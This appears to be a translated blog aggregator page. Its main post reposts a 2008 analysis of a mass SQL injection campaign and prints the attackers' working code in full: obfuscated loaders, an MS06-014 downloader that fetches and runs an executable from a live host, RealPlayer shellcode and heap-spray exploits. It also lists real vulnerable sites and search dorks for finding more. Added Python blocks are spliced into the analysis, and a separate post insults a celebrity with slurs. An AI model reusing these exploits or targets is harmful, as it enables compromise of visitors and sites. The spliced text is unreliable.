16:54 Interesting Karma » English - The Real Deal

I really haven't been in the mood to update lately, but today I couldn't help myself.

"Interesting" and "karma" have been the hottest words of the past two days.

I have watched the video carefully several times. Although Sharon Stone deserves to be drowned in spit, I have to say one thing: that "interesting" was not said directly about the earthquake itself. She really was saying that the process of her attitude changing was interesting.

I agree with some netizens' view: judging from this statement alone, she's more of a retard than a bitch.

Of course, in the face of victims who died innocently, even one second of the thought "is this retribution?" is absolutely unforgivable. But at the very least we should not distort the facts; otherwise wouldn't we be stooping to the level of a petty person? The purpose of Sharon Stone's remarks was to highlight her own lofty state of having "learned to be kind to enemies", obviously an attempt to gild her own image. Given that purpose, she could not possibly have been calling the deaths of so many people in the earthquake "interesting".

By the way, what I hate most is celebrities pretending to understand what they don't, using interviews as an opportunity to promote their "political ideas". You certainly have your freedom of speech, and I likewise have the right to despise and boycott you. If you can't figure out what is going on, shut up; don't make reckless comments on the internal affairs of other countries and embarrass yourself.

And here is an article for all the foreigners who pretend to understand: http://www.workers.org/2008/world/anti-china_0424/ The author is also a foreigner; at least this one isn't brain-dead!

Here is another video:

Massive SQL Injection Redux! - 0x000000 Security » Che, Dong's shared items in Google Reader
A new wave of massive SQL injection is spreading as we speak. Symantec raised its threat level to yellow[1] based on the news. I went on to analyze the current threat and noticed that it is a variant of the previous one, but this time a new Flash vulnerability[2] in the latest Flash Player is being exploited, as well as old RealPlayer flaws that are still alive. A Google search gave me around 58.000 infected websites that had JavaScript in the title as well as in other HTML objects and locations. This indicates the same approach as before, and it was undoubtedly done by the same group of attackers. I also noticed that part of the malware is being reused; this can be verified by querying Google for parts of the code.

The new propagating hosts are two servers in China, namely:

http://www.dota11.cn
http://www.woai117.cn

I queried Google for the websites and analyzed the results. I took a random batch of samples to test them for programming mistakes. It showed me that nearly every website was vulnerable to parameter SQL injection, and that the campaign targets solely Microsoft ASP-based web applications. As you can see below, a simple parameter injection on the samples supports the theory that the attackers are not targeting specific software, but rather take a random approach and most likely use search engines to locate vulnerable ASP web applications.

Six randomly chosen samples from Google. Notice the single quotes I put there to illustrate the problem:

http://www.hyundaideinum.nl/page_dealer.asp?dealerId=14801'&sPageID=100,050,000
http://guestbook.netlogics.nl/guestbook.asp?Name=BostonTeaParty&Page=2'
http://www.netonline.be/reizen/hotels_stad.asp?stadcode=1911'
http://www.dievel.be/blog/template_permalink.asp?id=133'
http://www.bockhoudt.nl/page_dealer.asp?sPageID=100,010,100&id=33&model=TERRACAN&dealerId=10798'
http://www.norden.org/webb/nordnamn/ViewPersons.asp?pid=1854'&lang=6&m_id=6&m_typ=Lowermenu


All these sites gave SQL errors upon pentesting them with a single quote, indicating a vulnerable web application that the attackers successfully injected with malware.

Locating such web applications is trivial; all one needs to do is gather a list of parameter names used by programmers and query for them. Such a list can be accumulated like so:
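To make the single-quote check concrete, here is an added Python example (not code from the original post) that reproduces, against a constructed in-memory SQLite table, the two ways a handler behind a page like page_dealer.asp?dealerId=... can be written: splicing the query-string value into the SQL text the way the vulnerable ASP pages do, and passing it as a bound parameter. The table schema, rows and function names are invented for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the dealer table behind
    page_dealer.asp?dealerId=... (schema and rows invented for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dealers (dealer_id TEXT, name TEXT)")
    conn.executemany("INSERT INTO dealers VALUES (?, ?)",
                     [("14801", "Dealer A"), ("10798", "Dealer B")])
    conn.commit()
    return conn


def vulnerable_lookup(conn, dealer_id):
    """The classic ASP pattern: the raw query-string value is concatenated
    into the SQL text, so a stray quote changes the statement's syntax."""
    sql = "SELECT name FROM dealers WHERE dealer_id = '" + dealer_id + "'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, dealer_id):
    """Same lookup with a bound parameter: the value is data, never SQL."""
    sql = "SELECT name FROM dealers WHERE dealer_id = ?"
    return [row[0] for row in conn.execute(sql, (dealer_id,))]


def probe(lookup, conn, value):
    """Mimic the post's single-quote check: 'error' if the handler raises a
    SQL syntax error (the signal the mass-injection scans look for), else 'ok'."""
    try:
        lookup(conn, value)
        return "ok"
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    db = make_db()
    for value in ("14801", "14801'"):
        print(repr(value),
              "concatenated:", probe(vulnerable_lookup, db, value),
              "parameterized:", probe(safe_lookup, db, value))
```

Run stand-alone it reports "error" for the concatenating handler on `14801'` and "ok" for the parameterized one, which simply returns no rows. Note that suppressing the error page only hides the injection point from this check; the fix is to stop building SQL from request strings.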

id=
sid=
Pageid=
sPage=

or simply:

allinurl:.asp?id= (for a generic wildcard).


The current files being propagated through the injected victims as malware are listed below; I wrote a short explanation of what they are and do.

dj.htm

<iframe src='http://www.dota11.cn/123.htm' width='100' height='0'></iframe>

<HTML>
<BODY>
<title>Silent love China</title>
<script>
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function base64decode(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out="";while(i<len){do{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)break;do{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}return out}
document.write(base64decode ("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"));
</script>
</BODY>
</HTML>


Which I decoded to the script below:

<script>window.onerror=function(){return true;}</script> 

<Script Language="JScript">

var cook = "silentwm"; function setCookie(name, value, expire) {
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString())); }
function getCookie(Name) { var search = Name + "="; if (window.document.cookie.length > 0) {
offset = window.document.cookie.indexOf(search); if (offset != -1) { offset += search.length;
end = window.document.cookie.indexOf(";", offset) if (end == -1) end = window.document.cookie.length;
return unescape(window.document.cookie.substring(offset, end)); } } return null; } function register(name) {
var today = new Date(); var expires = new Date(); expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires); } function openWM() { var c = getCookie(cook); if (c != null) { return; }
register(cook); window.defaultStatus="å®&#140;æ&#136; "; try{ var e; var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var as=ado.createobject("Adodb.Stream","")}
catch(e){}; finally{ if(e!="[object Error]"){ document.write("<iframe width=50 height=0 src=14.htm></iframe>")}
else { try{ var j; var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");} catch(j){}; finally{if(j!="[object Error]"){
if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552") {
document.write('<iframe width=10 height=0 src=rl.htm></iframe>')} else {
document.write('<iframe width=10 height=0 src=new.htm></iframe>')}}}
document.write('<iframe width=50 height=0 src=04.htm></iframe>') if(j=="[object Error]") {
location.replace("about:blank");} }} } openWM(); </script>"


123.htm

<html>
<script>
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain"/>');
document.write('<param name="movie" value="http://www.woai117.cn/4561.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="http://www.woai117.cn/4561.swf"/>');
document.write('</object>');
}
else
{
document.write("<EMBED src=http://www.woai117.cn/4562.swf width=0 height=0>");
}
}
</script>
</html>


I decompiled the Flash objects, and they contain the following ActionScript, which loads other movies. I tried to locate the other movies based on version info, but I have not been successful yet, since it comes down to guessing the Flash version that is being evaluated in the ActionScript.

4561.swf

var fVersion = eval("/:$version");
loadMovie("http://www.woai117.cn/" + fVersion + "i.swf",_root);
stop();


4562.swf

var fVersion = eval("/:$version");
loadMovie("http://www.woai117.cn/" + fVersion + "f.swf",_root);
stop();


Another function that loads a trojan called bak.exe; the CLSID used is RDS.DataControl, BD96C556-65A3-11D0-983A-00C04FC29E36 (MS06-014):

function gn(n)
{
var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe';
}
lj="http://www.woai117.cn/bak.exe";
try
{ aaa="o";
yyy="ct";
ccc="Adod";
ddd="b.Stream";
eee="Microsoft.XMLHTT"+"";
ggg="o";
kkk="p";
mmm="e";
sss="n";
var df=document.createElement(aaa+"bje"+yyy);
df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var x=df.CreateObject(eee,"");
var S=df.CreateObject(ccc+ddd,"");
S.type=1;
x.open("GET", lj,0);
x.send();
mz1=gn(10000);
var F=df.CreateObject("Scripting.FileSystemObject","");
var tmp=F.GetSpecialFolder(0); mz1= F.BuildPath(tmp,mz1);
S.Open();
ttt=x.responseBody;
S.Write(ttt);
i=2;
S.SaveToFile(mz1,i); S.Close();
var Q=df.CreateObject("Shell.Application","");
exp1=F.BuildPath(tmp+'\\sys'+'tem32','cmd.exe');
Q["ShellE"+"xecute"](exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0);
} catch(i) { i=1; }


14.htm

<script language="javaScript">
function gn(n)
{
var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe';
}
lj="http://www.woai117.cn/bak.exe";
try
{ aaa="o";
yyy="ct";
ccc="Adod";
ddd="b.Stream";
eee="Microsoft.XMLHTT"+"P";
ggg="o";
kkk="p";
mmm="e";
sss="n";
var df=document.createElement(aaa+"bje"+yyy);
df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var x=df.CreateObject(eee,"");
var S=df.CreateObject(ccc+ddd,"");
S.type=1;
x.open("GET", lj,0);
x.send();
mz1=gn(10000);
var F=df.CreateObject("Scripting.FileSystemObject","");
var tmp=F.GetSpecialFolder(0); mz1= F.BuildPath(tmp,mz1);
S.Open();
ttt=x.responseBody;
S.Write(ttt);
i=2;
S.SaveToFile(mz1,i); S.Close();
var Q=df.CreateObject("Shell.Application","");
exp1=F.BuildPath(tmp+'\\sys'+'tem32','cmd.exe');
Q["ShellE"+"xecute"](exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0);
} catch(i) { i=1; }
</script>


This one is somewhat quirky; it seems to load audio files for RealPlayer and NetMeeting:

r1.htm


<script>
var pao1="LLLL\\XXXXXLD";
var pao2=pao1;
var pao3="c:\\Program Files\\NetMeeti";
var pao4="ng\\..\\..\\WINDOWS\\Media\\chime";
var pao5="s.wav";
var pao6=pao3+pao4+pao5;
var pao7="c:\\Program Files\\Ne";
var pao8="tMeeting\\TestSn";
var pao9="d.wav";
var pao0=pao7+pao8+pao9;
var pps1="C:\\WINDOWS\\system32";
var pps2="\\BuzzingBee.wav";
var pps3=pps1+pps2;
var pps4="C:\\WINDOWS\\clock.avi";
var pps5="c:\\Program Files\\NetMeeting";
var pps6="\\..\\..\\WINDOWS\\Media\\tada.wav";
var pps7=pps5+pps6;
var paopaopaopaopaopaopao=pps7;
var pps8="C:\\WINDOWS\\syste";
var pps9="m32\\LoopyMusic.wav";
var pps0=pps8+pps9;
var sel1="IERPCtl.I";
var sel2="ERPCtl.1";
var sel3=sel1+sel2;
var x1="%75"+"%06"+"%74"+"%04";
var x2="%7f"+"%a5"+"%60";
var x3="%4f"+"%71"+"%a4"+"%60";
var x4="%63"+"%11"+"%08"+"%60";
var x5="%63"+"%11"+"%04"+"%60";
var x6="%79"+"%31"+"%01"+"%60";
var x7="%79"+"%31"+"%09"+"%60";
var x8="%51"+"%11"+"%70"+"%63";
var pplive=[x1,x2,x3,x4,x5,x6,x7,x8];
</script><script>


The real exploit
function RealExploit()
{
var user=navigator.userAgent["toLowerCase"]();

if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1) return;
if(user.indexOf("nt 5.")==-1) return;

creobj=sel3;

try{ Realpao = new window["ActiveXObject"](creobj); }
catch(error){ return; }

RealVersion = Realpao.PlayerProperty("PRODUCTVERSION");

var reading="";
var tiaozhuan=unescape(pplive[0]);
var fanhui;

for(i=0;i<32*148;i++)
reading+="S";

if(RealVersion.indexOf("6.0.14.")==-1)
{
if(navigator.userLanguage.toLowerCase()=="zh-cn") fanhui=unescape(pplive[1]);
else if(navigator.userLanguage.toLowerCase()=="en-us") fanhui=unescape(pplive[2]);
else return;
}
else if(RealVersion=="6.0.14.544") fanhui=unescape(pplive[3]);
else if(RealVersion=="6.0.14.550") fanhui=unescape(pplive[4]);
else if(RealVersion=="6.0.14.552") fanhui=unescape(pplive[5]);
else if(RealVersion=="6.0.14.543") fanhui=unescape(pplive[6]);
else if(RealVersion=="6.0.14.536") fanhui=unescape(pplive[7]);
else return;

if(RealVersion.indexOf("6.0.10.")!=-1)
{
for(i=0;i<4;i++)
reading=reading+tiaozhuan;
reading=reading+fanhui;
}
else if(RealVersion.indexOf("6.0.11.")!=-1)
{
for(i=0;i<6;i++)
reading=reading+tiaozhuan;
reading=reading+fanhui;
}
else if(RealVersion.indexOf("6.0.12.")!=-1)
{
for(i=0;i<9;i++)
reading=reading+tiaozhuan;
reading=reading+fanhui;
}
else if(RealVersion.indexOf("6.0.14.")!=-1)
{
for(i=0;i<10;i++)
reading=reading+tiaozhuan;
reading=reading+fanhui;
}

var pplivecode="";
pplivecode=pplivecode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpf";
pplivecode=pplivecode+"KRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJM";
pplivecode=pplivecode+"WVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfx";
pplivecode=pplivecode+"W6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKp";
pplivecode=pplivecode+"TRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMW";
pplivecode=pplivecode+"QuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJM";
pplivecode=pplivecode+"mLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoRWQgrWTnPw0o3QU96QUadwtnasPntou20aPkFNPeT8Quopwp";
realzh=reading+pao2+pplivecode;
temp=0x8000; while(realzh["length"] < temp) realzh+="hohoho";
var paopaopao=pao6;
var arr1=[pao6,pao0,pps3,pps4,pps7,pps0];
Realpao["import"](arr1[Math.floor(Math["random"]()*6)], realzh, "", 0, 0);
}
RealExploit();
</script>


Again a RealPlayer exploit, this one using heap spraying:

new.htm

<html><body>
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="Silent"></object>
<script language="JavaScript">
var pao0 ="pao7468pao7074pao2f3apao772fpao7777pao772epao616fpao3169pao3731pao632epao2f6epao6162pao2e6bpao7865pao0065";
var pao1="pao9090pao6090pao17ebpao645epao30a1pao0000pao0500pao0800pao0000paof88bpao00b9";
var pao2="pao0004paof300paoffa4paoe8e0paoffe4paoffffpaoa164pao0030pao0000pao408bpao8b0c";
var pao3="pao1c70pao8badpao0870paoec81pao0200pao0000paoec8bpaoe8bbpao020fpao8b00pao8503";
var pao4="pao0fc0paobb85pao0000paoff00paoe903pao0221pao0000pao895bpao205dpao6856paofe98";
var pao5="pao0e8apaob1e8pao0000pao8900pao0c45pao6856pao4e8epaoec0epaoa3e8pao0000pao8900";
var pao6="pao0445pao6856pao79c1paob8e5pao95e8pao0000pao8900pao1c45pao6856paoc61bpao7946";
var pao7="pao87e8pao0000pao8900pao1045pao6856paofcaapao7c0dpao79e8pao0000pao8900pao0845";
var pao8="pao6856pao84e7paob469pao6be8pao0000pao8900pao1445paoe0bbpao020fpao8900pao3303";
var pao9="paoc7f6pao2845pao5255pao4d4cpao45c7pao4f2cpao004epao8d00pao285dpaoff53pao0455";
</script>
<script language="JavaScript">
var pao10="pao6850pao1a36pao702fpao3fe8pao0000pao8900pao2445pao7f6apao5d8dpao5328pao55ff";
var pao11="paoc71cpao0544pao5c28pao652epaoc778pao0544pao652cpao0000pao5600pao8d56pao287d";
var pao12="paoff57pao2075paoff56pao2455pao5756pao55ffpaoe80cpao0062pao0000paoc481pao0200";
var pao13="pao0000pao3361paoc2c0pao0004pao8b55pao51ecpao8b53pao087dpao5d8bpao560cpao738b";
var pao14="pao8b3cpao1e74pao0378pao56f3pao768bpao0320pao33f3pao49c9paoad41paoc303pao3356";
var pao15="pao0ff6pao10bepaof23apao0874paocec1pao030dpao40f2paof1ebpaofe3bpao755epao5ae5";
var pao16="paoeb8bpao5a8bpao0324pao66ddpao0c8bpao8b4bpao1c5apaodd03pao048bpao038bpao5ec5";
var pao17="pao595bpaoc25dpao0008pao92e9pao0000pao5e00pao80bfpao020cpaob900pao0100pao0000";
var pao18="paoa4f3paoec81pao0100pao0000paofc8bpaoc783paoc710pao6e07pao6474paoc76cpao0447";
var pao19="pao006cpao0000paoff57pao0455pao4589paoc724pao5207pao6c74paoc741pao0447pao6c6c";
var pao20="pao636fpao47c7pao6108pao6574paoc748pao0c47pao6165pao0070pao5057pao55ffpao8b08";
var pao21="paob8f0pao0fe4pao0002pao3089pao07c7pao736dpao6376pao47c7pao7204pao0074pao5700";
var pao22="pao55ffpao8b04pao3c48pao8c8bpao8008pao0000pao3900pao0834pao0474paof9e2pao12eb";
var pao23="pao348dpao5508pao406apao046apaoff56pao1055pao06c7pao0c80pao0002paoc481pao0100";
var pao24="pao0000paoe8c3paoff69paoffffpao048bpao5324pao5251pao5756paoecb9pao020fpao8b00";
var pao25="pao8519pao75dbpao3350pao33c9pao83dbpao06e8paob70fpao8118paofffbpao0015pao7500";
var pao26="pao833epao06e8paob70fpao8118paofffbpao0035pao7500pao8330pao02e8paob70fpao8318";
var pao27="pao6afbpao2575paoc083pao8b04paob830pao0fe0pao0002pao0068pao0000pao6801pao1000";
var pao28="pao0000pao006apao10ffpao0689pao4489pao1824paoecb9pao020fpaoff00pao5f01pao5a5e";
var pao29=pao1+pao2+pao3+pao4+pao5+pao6+pao7+pao8+pao9+pao10+pao11+pao12+pao13;
var pao30=pao14+pao15+pao16+pao17+pao18+pao19+pao20+pao21+pao22+pao23+pao24;
var pao31="pao90"+"90pao"+"90"+"90"+pao29+pao30+pao25+pao26+pao27+pao28+"pao5b59paoe4b8pao020fpaoff00paoe820paofddapaoffff";
var pao32=pao31+pao0;
</script>
<script language="JavaScript">
var Paoyezuiai = unescape(pao32.replace(/pao/g,"\x25\x75"));
var bigblock = unescape("%u0"+"C0C%u0C"+"0C");
var headersize = 20;
var shell=slackspace;
var slackspace = headersize + Paoyezuiai.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
var memory = new Array();
for (i = 0; i < 400; i++){ memory[i] = block + Paoyezuiai }
var buf = '';
while (buf.length < 32) buf = buf + unescape("%0"+"C");
var m = '';
m = Silent.Console;
Silent.Console = buf;
Silent.Console = m;
m = Silent.Console;
Silent.Console = buf;
Silent.Console = m;
</script>
</body></html>


They log statistics too:

m.js
<script src=http://www.dota11.cn/m.js></script>

if (navigator.systemLanguage=='zh-cn')
{
document.writeln("<iframe src=http:\/\/gm.culhs.com\/abc\/am6.htm width=100 height=0><\/iframe>");
}
else{
document.writeln("<iframe src=http:\/\/www.dota11.cn\/dj.htm width=100 height=0><\/iframe>");
}
window.onerror=function(){return true};
document.write ('<script>var a7123tf="51la";var a7123pu="";var a7123pf="51la";var a7123su=window.location;var a7123sf=document.referrer;var a7123of="";var a7123op="";var a7123ops=1;var a7123ot=1;var a7123d=new Date();var a7123color="";if (navigator.appName=="Netscape"){a7123color=screen.pixelDepth;} else {a7123color=screen.colorDepth;}<\/script><script>a7123tf=top.document.referrer;<\/script><script>a7123pu =window.parent.location;<\/script><script>a7123pf=window.parent.document.referrer;<\/script><script>a7123ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7123ops=(a7123ops==null)?1: (parseInt(unescape((a7123ops)[2]))+1);var a7123oe =new Date();a7123oe.setTime(a7123oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7123ops+ ";path=/;expires="+a7123oe.toGMTString();a7123ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7123ot==null){a7123ot=1;}else{a7123ot=parseInt(unescape((a7123ot)[2])); a7123ot=(a7123ops==1)?(a7123ot+1)a7123ot);}a7123oe.setTime(a7123oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7123ot+";path=/;expires="+a7123oe.toGMTString();<\/script><script>a7123of=a7123sf;if(a7123pf!=="51la"){a7123of=a7123pf;}if(a7123tf!=="51la"){a7123of=a7123tf;}a7123op=a7123pu;try{lainframe}catch(e){a7123op=a7123su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=11&id=1897123&tpages=\'+a7123ops+\'&ttimes=\'+a7123ot+\'&tzone=\'+(0-a7123d.getTimezoneOffset()/60)+\'&tcolor=\'+a7123color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7123of)+\'&vpage=\'+escape(a7123op)+\'" \/>\');<\/script>');
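The dj.htm loader above hides its second stage behind a base64decode("...") call, and the m.js stub is dropped into page titles as a plain script tag. The following Python script is an added triage example, not code from the post or from the 0x000000 site: it peels base64decode("...") layers (the malware's hand-rolled decoder table in dj.htm is ordinary base64, so the standard library decoder is equivalent) and reports references to the two propagating hosts and to the RDS.DataControl CLSID named in the post. The page it scans is constructed for the example; the regular expressions and function names are the example's own.

```python
import base64
import re
from urllib.parse import urlparse

# Indicators taken from the post: the two propagating hosts and the
# RDS.DataControl CLSID (MS06-014) that the droppers instantiate.
KNOWN_HOSTS = {"www.dota11.cn", "www.woai117.cn"}
RDS_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"

# src= of script/iframe/embed tags that points at an absolute http(s) URL
SRC_RE = re.compile(
    r"<(?:script|iframe|embed)\b[^>]*?\bsrc\s*=\s*['\"]?\s*(https?://[^'\"\s>]+)", re.I)
# base64decode("...") as written in dj.htm (whitespace inside the literal tolerated)
B64_CALL_RE = re.compile(r"base64decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)", re.I)
CLSID_RE = re.compile(r"clsid:([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})", re.I)


def decode_layers(doc, max_depth=5):
    """Return the document plus every base64decode(...) payload found in it,
    recursively, so indicators hidden behind the encoding become visible."""
    layers, frontier = [doc], [doc]
    for _ in range(max_depth):
        nxt = []
        for layer in frontier:
            for m in B64_CALL_RE.finditer(layer):
                raw = re.sub(r"\s+", "", m.group(1))
                try:
                    decoded = base64.b64decode(raw, validate=True).decode("latin-1")
                except ValueError:  # binascii.Error is a ValueError subclass
                    continue
                layers.append(decoded)
                nxt.append(decoded)
        if not nxt:
            break
        frontier = nxt
    return layers


def scan(doc):
    """Summarise which known hosts and CLSIDs appear in any layer of the page."""
    hosts, clsids = set(), set()
    layers = decode_layers(doc)
    for layer in layers:
        for url in SRC_RE.findall(layer):
            host = urlparse(url).hostname
            if host in KNOWN_HOSTS:
                hosts.add(host)
        for clsid in CLSID_RE.findall(layer):
            clsids.add(clsid.upper())
    return {"layers": len(layers), "hosts": sorted(hosts), "clsids": sorted(clsids)}


# Constructed sample page (not a real capture): an injected title script like
# the m.js case, wrapping a base64 second stage shaped like dj.htm.
SAMPLE_INNER = (
    '<script>var ado=document.createElement("object");'
    'ado.setAttribute("classid","clsid:' + RDS_CLSID + '");'
    'document.write("<EMBED src=http://www.woai117.cn/4562.swf width=0 height=0>");'
    '</script>')
SAMPLE_PAGE = (
    '<html><head><title>Dealer list<script src=http://www.dota11.cn/m.js></script>'
    '</title></head><body><script>document.write(base64decode ("'
    + base64.b64encode(SAMPLE_INNER.encode()).decode() + '"));</script></body></html>')

if __name__ == "__main__":
    print(scan(SAMPLE_PAGE))
```

On the constructed page the outer layer only reveals www.dota11.cn; the second host and the CLSID show up only after the base64 layer is decoded, which is why a title-only signature such as the one the post describes is a weaker check than scanning the decoded content.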


My conclusion is that the person(s) who wrote this malware, and their idea of propagating it through SQL injection, are not very cautious. They do obfuscate a lot of code, but the reason they get noticed so quickly is the identical signatures they leave behind. In my opinion, they should drop the title injection, because that can be queried for very reliably. That leads to the idea that this is a fairly new way of propagating malware through many websites and that it is not perfect yet. So either this is a learning curve for the attackers, or they are pragmatic in their approach and want to spread malware quickly for various reasons without caring about being spotted. In either case, it is a stroke of luck for the security industry, because it could be made much more stealthy than what we see here.

Well, I guess the game is on. I think web application hacking is here to stay for a long time, and it has certainly replaced many other forms of attacking surfers because of the enormous scalability web applications offer. The last massive SQL injection victimized over half a million websites! And this beast just got its wings.

By the way, anyone interested in developing/sponsoring Synapse now? :)

[1] http://www.symantec.com/security_response/threatconlearn.jsp
[2] http://www.securityfocus.com/bid/29386
13:05 Consolidate Your Online IDs » 大学小容 > Make good use of the web and help yourself grow!

This post was written while I was putting together "Web Clippings and Notes: Activity Is Identification, Identity Is Credit". I found it had grown too long, so I cut it out and kept it in drafts as a separate piece; today I am publishing it for everyone to see.

People who write blogs usually have many IDs. They need to consolidate these IDs as much as possible to make spreading their personal brand more efficient. Spreading a personal brand in cyberspace is already very difficult, so man-made obstacles should be removed as early as possible.

The most basic ones are the accounts for various network tools: e-mail addresses and IM (instant messaging) accounts, and many people have several of each. These accounts are also divided into the username chosen at registration and the name the user sets during use. For example, e-mail lets you set a display name in front of the e-mail address: 小容 could not register a Gmail mailbox as Oliver Ding, so he uses swordi as his Gmail username and sets Oliver Ding as the nickname, so that it appears alongside the e-mail address. Instant messaging likewise lets users set a nickname at any time.

Whether you set up an independent blog with blog software or register an account with a BSP (blog service provider), you will have a username; this ID appears with every post you publish and serves as a byline. Next, the blog's name is also an ID. After that, some people apply for their own domain name and point it at the blog; that independent domain is an ID too. Note that in an RSS reader, the blog username and the blog name both appear, while the independent domain name is not directly displayed.

In addition, users who are active on various websites also hold accounts on each of those sites; some sites require real names, some restrict usernames to English characters, and some do not support Chinese usernames. Moreover, there is the problem of username collisions: the supply of usernames on popular sites is limited, and latecomers cannot get the username they want.

With so many IDs, how can you reduce the identity elements to a minimum? 小容's small suggestion is to register an English independent domain name if at all possible. If you can think of an English domain name nobody else has thought of, then you should also be able to register that username smoothly on the other basic network tool sites.

Recommended resource:

Own Your Identity
http://www.ownyouridentity.com/

This is a group blog written by Joshua Porter together with several other bloggers, and it was created only recently. If you understand the basic elements of social software, reading this blog will give you a better understanding of the Identity element among them.


<== 2008-05-27
==> 2008-05-29